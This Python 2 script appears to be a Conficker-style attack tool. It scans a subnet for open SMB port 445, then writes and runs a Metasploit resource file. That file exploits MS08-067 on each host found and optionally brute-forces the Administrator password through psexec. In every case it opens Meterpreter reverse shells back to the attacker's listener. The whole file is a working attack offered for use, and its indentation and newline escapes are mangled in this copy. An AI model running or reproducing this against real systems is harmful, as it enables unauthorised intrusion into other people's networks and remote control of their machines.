import os
import optparse
import sys
import nmap
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet, '445')
tgtHosts = []
for host in nmScan.all_hosts():
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
if state == 'open':
print '[+] FOund Target Host: '+ host
tgtHosts.append(host)
return tgtHosts
def setupHandler(configFile, lhost, lport):
configFile.write('use exploit/multi/handler
')
configFile.write('set payload '+'windows/meterpreter/reverse_tcp
')
configFile.write('set LPORT '+ str(lport)+ '
')
configFile.write('set LHOST'+ lhost + '
')
configFile.write('exploit -j -z
')
configFile.write('setg DsiablePayloadHandler 1
')
def confickerExploit(configFile, tgtHost, lhost, lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi
')
configFile.write('set RHOST '+ str(tgtHost) + '
')
configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp
')
configFile.write('set LPORT '+ str(lport) +'
')
configFile.write('set LHOST '+ lhost +'
')
configFile.write('exploit -j -z
')
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):
username = 'Administrator'
pF = open(passwdFile, 'r')
for password in pF.readlines():
password = password.strip('
').strip('
')
configFile.write('use exploit/windows/smb/psexec
')
configFile.write('set SMBUser '+ str(username) +'
')
configFile.write('set SMBPass '+ str(password) +'
')
configFile.write('set RHOST '+ str(tgtHost) +'
')
configFile.write('set payload '+ 'windows/meterpreter/reverse_tcp
')
configFile.write('set LPORT '+ str(lport)+'
')
configFile.write('set LHOST '+ lhost+'
')
configFile.write('exploit -j -z
')
def main():
configFile = open('meta.rc', 'w')
parser = optparse.OptionParser('[-] Usage%prog '+ '-H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
parser.add_option('-H', dest = 'tgtHost', type = 'string', help = 'specify the target address[es]')
parser.add_option('-p', dest = 'lport', type = 'string', help = 'specify the listen port')
parser.add_option('-l', dest = 'lhost', type = 'string', help = 'specify the listen address')
parser.add_option('-F', dest = 'passwdFile', type = 'string', help = 'password file for SMB force attempt')
(options, args) = parser.parse_args()
if (options.tgtHost == None ) | (options.lhost == None):
print parser.usage
exit(0)
lhost = options.lhost
lport = options.lport
if lport == None :
lport = '1337'
passwdFile = options.passwdFile
tgtHosts = findTgts(options.tgtHost)
setupHandler(configFile, lhost, lport)
for tgtHost in tgtHosts:
confickerExploit(configFile, tgtHost, lhost, lport)
if passwdFile != None:
smbBrute(configFile, tgtHost, passwdFile, lhost, lport)
configFile.close()
os.system('msfconsole -r meta.rc')
if __name__ == '__main__':
main()